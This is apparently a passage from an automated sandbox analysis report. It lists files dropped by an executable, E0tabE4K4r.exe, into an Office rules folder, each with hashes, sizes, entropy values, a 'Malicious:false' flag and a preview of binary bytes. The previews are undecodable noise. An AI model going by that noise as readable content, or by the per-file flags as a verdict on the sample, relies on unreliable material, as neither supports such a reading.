                                                                                                                                                  SSDEEP:48:PooNBzpjExcmNsoCgzD7n9SHox7bzngpik3BD:xJuxhzncIxH4/
                                                                                                                                                  MD5:19A635618D3F7A9DD9A4F1FF607037AC
                                                                                                                                                  SHA1:679E854A231D3E3A05E1D5FBB569C83DEB2DF248
                                                                                                                                                  SHA-256:39E0EC9B29B19C3C825894BC0D485B8E8A3A27B3F02AFC576F69A968FF519DBB
                                                                                                                                                  SHA-512:BF5308C6C12115D6384BB4169C9E5B45288FF1348FECDC00CD00D42226AC9B159352A9C637AD17FCD6004198D1E662A8A5F60604E707D496F24BB91C82F95F3D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlQvmp.......;.....%.J...d9.K.Z'G^....A.*l.E3 .Xq63N_.zrq.Zt..r..*.$...w1O.Q.>....Pc.._.u3:..|.n<......:..L...D..L..S....W...._.V.AN....=ca..g..Q.:...(I..D..Q...j@..l....=..p..o..?I.....9.w.O..(#.ZA|u.....L.....,....n..^.l.b.f..WN.;s...B..+.6..9.s...r.WF.?.c...]....DR.....nv..r.....L..<.u..I...."b..g"_......(....3B.^.'..'.)f..$....(..8Q..R.)......d]z&.w?.Y9:m.FJ........FJ....H..z..Z[.u.$G...f@e..~.g.p.\.O1.I...h...qe, ...s....O...8#..E^..GB..........w(.:.p......l...|..a.S....n.m.u.r.9..5..f.....FwQ...$d..Y..fS...y>O..9_...xgY...z..g..6r]Ma(....P.Op....p...B<@%5....e....J..d.....pM.0|....,'G~.E...!B..J..e..C?..+..A.U.\.....1@I..]....U.b..z&n.q....?.i|Oz...v\J...l...<...F.2i..v.R5.....y8.w:$..^V..5*\.bs.Z...K......w..X.Y....P^......Ox.$.~9..U.w..]..k.}y....4m.<i............L....as;.......l.e...J.vSp.%.e.4U..U...}]z./,...@..*1.W`..zLB.\X......V.............j..[.........r.8R13..^!uHp...D.6...'..'..U.@hk0J.x..!.X.7....9O.A..].[L&..=...}.Eu.1M^*.VTOs

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11210v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1311
                                                                                                                                                  Entropy (8bit):7.825863729278237
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:QkcRkXfxHuE+07krvQpllQR8Lb3dh19JLaj0kh+V4e4neVl1MdKfW6/my/eb2bD:QkcRMfxHuEx7pQR89h1LLC+V4e4nSl1d
                                                                                                                                                  MD5:D8A1B71539A9ABB69A420E96EA5E726F
                                                                                                                                                  SHA1:055CB7263B52515A2E05F98722559B72D4ABC52F
                                                                                                                                                  SHA-256:F001F47B423695A57AEDA0230E2BA8199B838D7343D43A5ADDF2E41C2D81E904
                                                                                                                                                  SHA-512:0EE08FD27B1B76503586C06A912F921D1AA6CA83BE9250D7A837E546532FABB5AB85C05D63D0973AD9B667A85F0EC2A391202629795C3346F159307C780721C1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlm.Y.9.....ck.9...O.1.:B.:..*@..,......o.??.].uM.=../.[E6..D....ZM..B....<'o.gESFb$L..y...q...l,..\.*..#..POC.z.... {.eC..].mI.t6.:IEg...N..H.._.T.+.\.k.......Q;.v..?\1}...|.oX....?..$j}..%.......f]?.-Y.U....%..%6..[.]6r.......R..G..M.X...........~..a........U.>.99.S.`J.pV7...).....:...R...x...eE?2D..hJ..:.[..o...._.R......J..~x.Ar..D...gG..i...../.L.:...Cr.....p....#.J.<.P..y.D.TYB...#o-F<......q5.B.oK... .#.Qu.[d4j......C.J.0.<...ct...3../..s*.5.....e:T._.{.^..1......e.......5:L0!s.}.;j.7...<h..8.....-.4.....dYV.<Q..Xxn..Z%..`...6.V1.HV..NB..)...@|{P.f.XNg..iD...'......U......d.+u.ex.U...!....hH.x;j..u&.df..`B5.s.b.+..G#t.c.~...P.5..+.....0l.6zS.E..^...E........8..$.28.....z.sS..y.*....l.0.-.G?.tKxD.Z9H...2.L...<.#_..s.,n......F..7fbCl....{(...&IN<......%.t[2-Q.N....BA....u.,..1Cr..2.#....Y.....;m..9.8\.4>.Y..o.B].M}!.oy..".`0.....V.Uc.,/..<I...r.@[...6..{-.m.4..`.....>?....v...B..1.........#k'$.8.!.e.(..&pD...A.-@.....J.X.D...>......8

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11264v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3172
                                                                                                                                                  Entropy (8bit):7.937845773978792
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:BzSxjbWovRUn6ILRlOmh15msoEWVMkhqLwijw:BexjyoCnXLL8solGwWw
                                                                                                                                                  MD5:7E0E5F38CB548A2D9C23DDFF8E2A8069
                                                                                                                                                  SHA1:B3E872B1AFBBD93640B7F1CA7CADEFD2EFA7D64C
                                                                                                                                                  SHA-256:C45AFFD9DE7AD39BF0B88C4D15CD5612A54C55624D57588E97433900D8B896BF
                                                                                                                                                  SHA-512:7B641345666326CF5C81C8BD8DBABC7CE540CA353419F552D199A9EC4F765BC901DEACC31D8D95720443237C0622B493E5DEEDA4243C8F6FCC650BD1115CB238
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml}.......D.......<..[.]..=......2./.<.uk.y..[g.../.$k....g..4.s....(......of.A...|s.......4.4....\...s..EF.:..d.$.I.f8.C.M....."[;...5...%.FW..s.yd1q?UQ3^..p./...$..7.....9$TV_[.dW..%.|..kR..N......6....#....yKe.....T.....`QD9. .-.3.....h.N`.X........9...(.'..6.Q.6.,./T..O./...].X...m..O......\..7.?6._o..yB...O..]./..9y.C.=..I......"..hK.|n......R=..o5..u....Gg_..'.x.l.RP}S,...{-.......n ..........;R..;..q.&<.....e.gz.H;....ytS`|H....\...T{.....|...:......#V{....@.....N..%j....{r.....wOAA.C....Z....[......fDP.'.&...H.2J.O.z...7.q.....L.HaY94`+$.(..V.2.F :.x...@.%.K..]..B.P.6*.'..IK).t0...T...S.^....;x...~.V-h..JF?....x..b-..!Z.M.....[.}.["*.mPw..9%..HE"._4...K..A./..v.d1..-..b..&(~.I.......,....Ux..)2]...1Z.\...0...}...........z..n.K~...H...Y.:.....4.M...*O!W.%..........a..mF...*.D-..y....u*WgW...8.....=..A....o.wD...L.%...+.4...l.5C.p..7.Ij..w.*;....~.[.._Q....}0$....bV...H............`.KI....h'Ue:=.Xo. H..T.&.Z"[.j.a)

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11265v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2096
                                                                                                                                                  Entropy (8bit):7.901297552209329
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:+3Xdyz0O0lGd31G0XHWpOssrEvr1DciSJID:+3XdgMGPGG6qYzVTwU
                                                                                                                                                  MD5:D5B4E062BF2214D30E003228D96A6C97
                                                                                                                                                  SHA1:521730737422C72E02D31D4D439F49F19FD47B60
                                                                                                                                                  SHA-256:E65399E373E2C1F9F643267ACF881B73A1EDDC50A1E5BB2A81D1C3FE6B2A6717
                                                                                                                                                  SHA-512:A6C312C5284587DAAF95771D9806044A0C9AB5492BCE2746A0D1D3EEA046EB71CA25265B1EFE6A232CE900C1E47CE81E6EDD989238A73C4C920FDE3234436693
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlf....B.[Awt7..WvK.0..%.!...m..).I$R..>...)nh.#b....x.7...M....C.8..o.WPS..870..b*.h.+..:.#..*.e8...2...[)/..l..b....$w......pg...o..{.Bi.Z..V1..=K.J.......WlG.2.Et.."t..,d....3.l+^.....91....nxB$.W....x..g}L\a._\..,.&......9!....sQ..]Y4.....ai..j....G_@m ~<+x...tp....1g..w.8...TEx?.c.G.2.Z.0w.........).r[m9.......@46.}j~.0.L...c_..0.....8ip^6...|...2&.JN.[...x.2=FHw.....).g.iGg../E....>....w..].4.wR...(....0....p..}G..G{....F.......R...;......U`.e..P.K..(.].NV....S{.!.........G...M8.F......o..=`g?.i..U...p....l...3t..VvL.......'....."]+..X...6...p(.c....wC......i.......S<...F....(...[R3.f....?.:B?.dS............N.m|gs.......A...'\"nW.d..+B0m.@.a.C.d.N.]..N...^..l.{;A.aI.J\.........5....KN..F..G..8.i.O.....j.............o....s6..A.K...Gm.5......M.CSL.3.7.T'_:....o..8..sL..#.....?/..z.X.sF..&h....=Y...p..`OY......"...d.L..%...s..S%t....O.....tq.*}/...Vo.c...Vs.O.j.mz.G8-.aD./............\..Ry..N=>..0-.b..g% ..(.;..~8....F-.i.Qp..g..b.b5p

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11285v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):7525
                                                                                                                                                  Entropy (8bit):7.973956735886395
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:qWGdspIAD/EXMo7dijmpaUHmYHqCFJPse7bS06G:qWGGpXrEXMo5i8aUG9CnXS06G
                                                                                                                                                  MD5:62B069168C48CAAE46F012D70EF2B4BD
                                                                                                                                                  SHA1:11CF7F57A178E7BFDF64AE032F4608DB325633E5
                                                                                                                                                  SHA-256:559BEB14DD2EDDD1C07F82833585356B1D590B0646B7A488051B8E37291C43BF
                                                                                                                                                  SHA-512:B92A2DBCDDA6DBC2C3382B2FC2B157486DCAED06DEB500DA79BCE712E30BC3905059BAD8CA659C05B67884D82542BBB46A60F9675D1480E5B2535249FCE4F35A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...E1@..:6O0N....R.e..A(..."1.o..y.-.!.......\...J...H....ml.....H1.jIX....s.0.Hm^@..............1.;..89RV.\OY....Ntx......S.s.G[..}..w.v..R.@G21>.I.....p.k(.../.....n?>8..Z./..;...^.r\.6M..Gw.Y...s...Ve..u.4t..h..Og.G........\)W*.\..r.C.....)ZT.Vj.a...@".Z.tUE.P.\).H....Tpq*.n....1.....xO...W5...SG...P.R./7........~..)2.gH.jj.V..e8F.S...5G.E5..N..E..p8F..r.44........1..m.?.tZ....M4....m,.+v.&a.......q.l..K.x.A.|.}..49)y....s.S.~.3.1K8.<.R........}Z\....#.W.~....cC..H.g..?..,t..Im.Q{...Ger..MA.e.(.i.........~4._.q.F.+)..\u.J..&....t.jC..f..._M..d...+h...{\JA..FB!..2..m.z..I.\....Q..U.f.. &O.BG.....{..(.w...-.....<...`..:.#..b.X..qZpY#O..\...%N!.Z..Q.b....h..=....U.X3]_j.%q&..8L....9p....i...fb0.2.q0.Yq.Xk..H.pS<..T......#... .j.:..f.gHVg......~......R.Z...7.=......Z..3}-X..<...CS....EH.tm......Xk;%.=.~..&..y..F'.0.b`@.e}..H..?....)......%.cSe...I...d.$.0h1H..0J..^Z.m.d.....in6..@....K8..>|..z.v(>Q.m....5@N.C...0.....d1...rUo

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11289v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4197
                                                                                                                                                  Entropy (8bit):7.958667741293994
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:GWn+6mbMCMxbfH5CQOf/zUEVR6JbfSVRufRx/:GW+6eMCMxz56nYED6NQuZB
                                                                                                                                                  MD5:9EA083AEBED526BAAE961319F12CCC54
                                                                                                                                                  SHA1:0BE95C3EE10FD590E87C8A084FC0CEBAD24D31AC
                                                                                                                                                  SHA-256:575603FB5A199ADB81C033A25E8F8690821538ACC029C5941769843B2FFF8CF8
                                                                                                                                                  SHA-512:0213459662BAC5B48BFF985D8C1B8F376588E520D0BDC698B12A0C2F254B6DC1F233FB0DEF38C1CE166EBE671C28291552E362FC5186036ED30CBD14C68AB4FD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlXBt.f.cGaJ..Qk5..S......Y....qZ._Ve......w.....n..D.....#.f....&%.$..:.Vt..`.j(N..xPu..c........H....u;.9.sD..?R.y..1.P.[.r:.Gl..9.Tjh......._..d.h..ob...$B{.....Bw.vI.k.(z.Q..-O\N..x............0...;...I$$..,2.t....k!.......Q.'..;.L..M4sZ.bb....{lG}v|x....|-."Z......m6.F....G.....X...l..XT.?.1..I.1B*a.......O.$..N..q...{...:+..iZ_B.!4k=.L..<....7.bx.(....fsr6a.z.S4.~..Q.".pQ..B...%|K...{.]>.QN./...>`@;.......|G\..#.By..}.9./..n.y.....V.)...~EYq.#i.%...M...*..a..........I.>...~..m....[{..$..A._.}..p._.O..u..=...n....~+c.UEt......3.:.W.....z3.,n....z....L.....+...N.......My..[.Giw..p(...w.V/uz...u^`..W`L......+...^_...-...XmB..^. ..E..R`..!'...Q..|_]..u.iQy...u@..c.M........(..zC)...(JP8...h.....?.........=heU.(.....|Y.]$..mj%...Z.Hc...u...31...}....%........d..S...d.._..$.T..../f...L._d...W.38h..>82....=GP.....Z.V +....."6N.}.&.TB.....5.*... S......'%y.cQ.....Ek..hN;.....Ch.W .J.?.XYK.Q)?".......B.../.p...N.ElO.>...u..T..h.....J.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11300v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4608
                                                                                                                                                  Entropy (8bit):7.964119887092751
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:FiZzHSI548lYPDBQoAZw0zfuargYFOCw4V5YsFVrSTxto+GS5yMKXMB15qONO:FiZzV5DlEBq5TuarNFC4gSrv+0XamONO
                                                                                                                                                  MD5:CCAE2475ABFFA585ECFBCAEEF53F0162
                                                                                                                                                  SHA1:A53688CDF74C1F483943E44D2E4245CBED8B881A
                                                                                                                                                  SHA-256:0361F325FC9DCEA005721F60CE709F9D165C4026F2ED24F18F31EAEAF43E7340
                                                                                                                                                  SHA-512:607C66EE8ADD91FF6B2888CF50CE884D7525A6C00283D46844B61C3246D625655D110F74CBC55558AAAE201B008DFA15C6BD6920DA3FFB6661511984F5BC5E6E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......}....L.i.%R..}..1b./,.c..1........Z..!..I.|..[..........c..(.)..QN.bTr..3.m....cC:.\v...{,.8...i.7@...'.a..%x...f3;.Q.#G.7...2n.wT..2lO..I.1. ..t}..o"*....s..U.U.#..G..<.L.o... 3.$$.......u.!.....N.@.....{...X....r.......4.~..[.....%...S.b!.^..\....lMEs.b.p....m:...._.h.`.;.......n..6;4...:<.5.6..h...`.*..;.F4?1.1..~.< g$HZ..[.Za.YJ.?.9....w..z.].7..!>.z{AB.}Pmt)U...f..C......t]^h=-......v=....M.....].`......S.~......b...L."p.....Z j|..e}.@....$.M.J..T{.&...._85.~.D...D. .D.}2...Q.j... tl.eda..$_..."...3c..6K..D.1.op..G....ot...........Q.......s..v..,).-v.E.)........Y.H.!.4..f..].".R^.,M....S..@G.y..a].r.......D...Z..3....VF..\....t...O....>v..Y...7.....x\.t......p......j.r../.e.6.9..`......s...L.{.....j'....{....o.......~..".%'v.]..._ ...C@$p)1..%.....I.Y.Pk..s..u1...lv..`7&...N.d....1 .g..[.6..c(*.......7.B...0..D. .0.e&.q.`.......*.....a......R.h5;DB.....b\ x.c].#|.D.k.i.8.0.h.G8.......]f...!.'..........

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11302v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2884
                                                                                                                                                  Entropy (8bit):7.921368592638741
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:9WIayhxNhRKo1S4xBsxEUbSrii7vZ6SvhvbhLvV12YdHyupda12D:wxyjVK+Sr+AEii7vZjvFb92Yhyupcg
                                                                                                                                                  MD5:DDDDCA40EE901C76F5987D9410689F65
                                                                                                                                                  SHA1:4BBA42A7A890E3D5FAB7A22C88AE123FB9CE9D42
                                                                                                                                                  SHA-256:56068436FE385B2E8FC6694C692773F62FDDA55C533404E68943F8E2A39D846F
                                                                                                                                                  SHA-512:B98BF34B81A1067382EDA5E4FE0B119FAD591037D6C3E93AFF5E2B46EFCEC882BE1A5CD73FAD303C1AA8AE5447903C2C5537D83475FC81243AB18F8A5C39EFF4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml7n~.I..ut'i!.c.....d....@I...Wr.3\.]V..X_..._ig..l0..g..L.Z....{....~V...#....B..`..]d&..=..w..M......wY...P..o...5.B....U{qTY..k@.2B....c.#....=r... ........>*@.......,.#...P..Q4....|V$1o.j.v..?... .c..f.....&xNc.jy.k\0c.K...~......u.d...E..k.........h..k-|7....4o..7.d5..Xt..R.d.-@5.(._h....zp..3.j...U.6...(.TfL.`...s...+..V.F...^N.w.0.4lZ`....m...hPc..?@..po\..L.f.......(.:....F.........Ef...'....4..n.g_.4.U.....u..5.W.=.... ..:`s...vx...K,....(q.........g.e+.-..Jb..T.Q.....i'.&........"....(.=..!.f$(.y..@......O..e..5....&...x*..UJ.......k(..........Q.m.t.....!}.......}..*.....,.D38.........q..Fei..caJ...9g...7E.%4....Z...nJ).oI.:k.4.(P..6x.....k.I..i.B.!.jb.>..(........r..C.4.=[/*.(!...6.nEH..ae.~..]..).].d#..ta..4...S..p..=......KH.1.U.Y.Y..Z.\.......5..<xj.4'...U.%+..-..kW.|9I..T,3z.R\.!..#vL.4+.L"...]...&...km@.5.M......F..Y.6....P.......U.d..4a.]8.n....C.$.>..s......|#A:.o.../.....).:G...Z.9...]..-..............y....v

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11362v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5842
                                                                                                                                                  Entropy (8bit):7.971485631620812
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:+Vox5/wzAQMbRnw2ujpLtR6bWAH/Sc/5GdfuI6DbWn2dFx3CPMDUNA3a5aWy3ld:+6FbRnVujp5R6KAfScMgIP6rhkaWy3ld
                                                                                                                                                  MD5:019031520F61E16DBD18F735A0944559
                                                                                                                                                  SHA1:62384EBCE72186536575EC110234BE461B89C5A5
                                                                                                                                                  SHA-256:83F71D63CE0B433AA4BAE8E2532A6A178370B64CC1F9B669E2FDA6F7A1787BBA
                                                                                                                                                  SHA-512:A16763DAF5F612EE5CA1BB75EC254CEA03A7E78960663980BA38E40CDCDA03C134FE26D121B3D049C5FC10F8B1B97F32554B320ADF033E33E737A63EE4AD9D5E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.../..:q<8.u...G....hu.....HU.-#{. ..P.s.(5Z ..N4Ur.`.V.....A..i....... ...h....:.......@.-....`.i...../.0T...ek...N/[CB....3..:{..t....Zqf...bF..LC.....fcc....Go#.CA".L...[.R........xz.^....>.....,p........UW.0E%+?..l.x&.).9.le..K'.m.U.....+.i......F..7.....6v7.)k....Nm.qiF..JY..aQ]...Z..N..LM....._....2C9,..ms.......E..B....5<.\m...:.0...3....................X$.p.x&.P.xzd.O43.....Z.I....U..O.... ......4.GlC...].Lb-..c.....Idk..u3....?.4g..J..]..!.LP......Y.......-.c....)"..sP8....hll|j...@..k..(....W...n(....&c..um...k..RGZ.h..,.<....g/.7.[...P8..2K...C(D..X......h...A.m....0......].....U..EG........:.{n'..BzRm.h,...^#.."wi@....m].I.Z3.,.q.!N.H......<tR.?L..h.`..xs....."<.D.S...........D.S_......;..;..dFj...g.N.Y..~.V.Z../..I....../.:.T..._.*.|..=z/..a.....V#bJw.A.Rq2..0c.3...z'...2..L$....*...W$-..O...'.vs..79......>c~>..v. .7..d......L.c...#...e3.iB..9......w..O.v..z.D.P.\...~_..F.3*.o.{.M1...5,...&P....rG...;\5..9.0+.,o\

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11369v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2023
                                                                                                                                                  Entropy (8bit):7.910515640323767
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:opaRH66LSbYK8MFvO847tTDBVyzj+gCn3FqzfD:oEp6WYZq1Vyg14
                                                                                                                                                  MD5:73AE833719492093B7A6361C67A7FCF6
                                                                                                                                                  SHA1:015B688F3705C4BC86CEF7FA7599B0C0CB99E607
                                                                                                                                                  SHA-256:0A6B50BDF5AEE3FEB6ECA192274663873C1E5885D19C5DF2005AB00C21313AEA
                                                                                                                                                  SHA-512:DF74FFEAC6099D06F553725B6026DEA4FF7AFAD54860F1BD60E5C8E8E6EDE6EBB20C5AB09BB9BBD1A688EF710D54C643778927FDCBE4B0EA1F17AFF22D9F802D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..@...d....ho|.v....7FX...J$2y.....1K.3.yG...N*.(.T.X...jmc...>....c....]|....iF...eOGm]..H1Ue2.P:.E1..#...A.f..6-.J.>....a.D...N.A.SL.......B..P.%PFt.Z2....6r..=.Z3.u.(.W{.O...9=..!..*..Q.z.hJ..[C.....L.Up.B......0...(.m.M.....p..zVn..9...a%-m..;IW&G..l!..)o.Q.6..::._.'...x.).Nk!...F%.U...c.T9..... Ph..&.O.c......8<..NI... /....l#d)N...h...>.._.4L4Bb.mz?..4+......u._Ul%.....om.]t...:.d=..l..kcb<g..t...'>...$C................6./GT[..o........ps.c..).Z>.P...2N)...x..A..nZ.B.W...............h.%.m.."`...v(....c.1.P...\.Z...T....F&....E^........$...?%..z..."..o.-....@.*....wn_.{.V...x.....fU.U.....FT...Q.s@.w.S..1rU.91.U'..?..T.g.9.....C..NNIP.....Wb......[..N.E.H+.4..\.(R..Q....V{G=...-c....k....[.mP....]..i`..A./z...B....X.!{..RWv...Ap........=..t.g...[..Z....$~.\.F.O.U....W.:..Y+.+..YKe..<..%....D.AS.....L(.Y.I..$s...~.l.Ae.n..%.7...n..[.e....m.p.+;.. ....#...Z../.K.B.."y.`.o....j.X.........].4K~....|W.p;O|......1..&J\.j..k.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11370v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1001
                                                                                                                                                  Entropy (8bit):7.795315087526558
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:WGP1Hk+Pklk7fzwh7cw1zluyBULlx18lEGT//IlSq0vOh2bD:W2Zaobwh7cwltexx18lEG0/0FD
                                                                                                                                                  MD5:9252410A53F94D5D2E116024DB638C31
                                                                                                                                                  SHA1:D095E1BAB6D7DBD8746008B2D29B19930656435A
                                                                                                                                                  SHA-256:1E59637B689B6DEC614A9F4CF846F72CEC955C4E1876DC116B233C8AA2D4CE43
                                                                                                                                                  SHA-512:8AE1DDFDC45AB7997ADEFB137B1D11E3507325A0F953B5E444E19EAFABD348B40507B647A3616EC81A0929674E8DCAE4BAAE4E87E557B1B34C645BE1CB44DC0F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.@!...Bh. B%.S......y......|....h%..]f.d..,Q..N*..zI.u.W...|..H......`5.......?.....82.h.AY....Y...F.R..~.bs=x...Q....!.z.pfDP.0I................L0.H.;.3.`.Qe.o......M.{.....:.(l}!......d.b...`..!..26U.......-d... ..t .nJ...6C|&..@...T..2..}T.I.e...I.<`..t.X{..$.....sB...Jt..|G..f..=G|......=7...$'..%....Vr.zu....4JJ.)..@p....d....68.W...h..Y..Z....p.A.....1..5!....;...{rleq..Kk.X...}...U6L.d.|..Ws..Ve.F..[....7n...M........I...q..8.Y.=....h.^...,....M4L.-].0.L.T.3..S....Q...,.P......P...qT...`<....mK..:.j...|(..->.?..........R....8!2..8.:8..=....CW.."#0.d..:.X..o..*.g..._.].5m..4...EV.(2d....K.ahY .'....k..|.k...eP..7..b.<.F.....$.../...m...l.h.)$._..6C...m.b......./y..1...R.3.R...M.]..@.R...~.e.......bx.E.\...#......6..i.*Z..S.tZ!.|.*.x.U.].y.p..P1...]..8..........Jz.G$.VS.u...MhLj....T...{x..ae.^k....4~..-..g.3..............."c..w...Z-?>xH.5.....d;..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11381v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2743
                                                                                                                                                  Entropy (8bit):7.934849152203006
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:pEXidu6EZOeBKpfvhFqCl4oCfIfves4PVLMiqXku+oyMMK6MRWBEnn7uqjQW80DO:pOOeGhFTlCces4tLkv2K6MRWe7uqO0DO
                                                                                                                                                  MD5:B1675C91CAAE5CD60D968A788296547B
                                                                                                                                                  SHA1:DBBBBE0BD92A043B4B594F672A40359713E59BC4
                                                                                                                                                  SHA-256:E92B1C2F893A2173A37C86E7EA39190AA09EDFCBAE93D47FCB1002A8DA1C5FD4
                                                                                                                                                  SHA-512:E1DE7F0AD56598F6BF5ECBBE5C4E697B88356ECBD1B045DE24BA0C00164B34F2C7AAFB152E0382A204D5E06F66D8DAC0FC34FF5503B811FF340CBA22DCA55A07
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...)...{.-.X.F...{...E......h.D..t4...1.8k<.6#{...?X...y?.f..T..G5...@.w.E.h.bQ."z.W.S..h..R././....s.tX.r..O9...<...]+;_@4.v._..y/O0+.t.0...q.Y....Q...y*..V..J.~^...>...({V.1...!J.{.>~z..r..SX.k.O.S}*..Q..V.,sU.....(.....1......i...+RAS.|.."x.VT.....Xp.T.tA...n....BC..$7,..nB......q|.+.n}.%Xx....f......=....W..n..c.Yo.jT..&....i!....n0......<...H..l..k..$m.wmy....V...T7@.dF..K)[....D ..-..n........p.>.%.bU.d.R....X.K)..p.=[,.h..e...U..!.....^F...RoK..........._..............+&.,H.....&%..]....y|.l.......4..B.JP...8....>4...e.....0..GJ..V...i....aX.QTxu..?.*n^BD{.x[..w...@.@.W.p.y...7G{..W.m..q-.r..@.......R..>.[B!2...Sy8.t\[.q..;....C^S\....0...EQ_...OW...b|p.,n......!q.p....CG.5...c.`......W7.d..T.....7...6.......K=..8...A`gb... ..IP...5...YI.........k.[...k-~T.\.~..:.D.. ..........~`..,h.p..(.'%l.J#...E..`.J..&.8.....g.-....E7....]...T.'.(.5}[;...!.<.7.$d[.*.9@..K.V..O..HXS....G.f.\....`]...B..>.{...6.pW./z....k.LdZ.....$l.r.7.T..F-

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11446v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11063
                                                                                                                                                  Entropy (8bit):7.984021823487741
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:gT3o0VDnFUKnv1XyTc2ztKl/UezXwlhwlkvK0W+5gJMFSq+:gT3VVjFtF3GKySi2kvvWuoEK
                                                                                                                                                  MD5:9ABA131521F6D57C054724B0909F1CDF
                                                                                                                                                  SHA1:24B840F15E400DE15F3DBC709DC8716B66CB8552
                                                                                                                                                  SHA-256:F0E0EA62F9E22FD250D6846A207A78FC4B95178518E585E6C00AEEAAA027B0AB
                                                                                                                                                  SHA-512:2398E72E335FEDFF37FC8028B5994CF55A4E7439FF5B4C76EB024EC563432D791A3797871F1573D1D4D10F60C96312460B2A94760024D56D942FBAB5D9E62B2E
                                                                                                                                                  Malicious:false
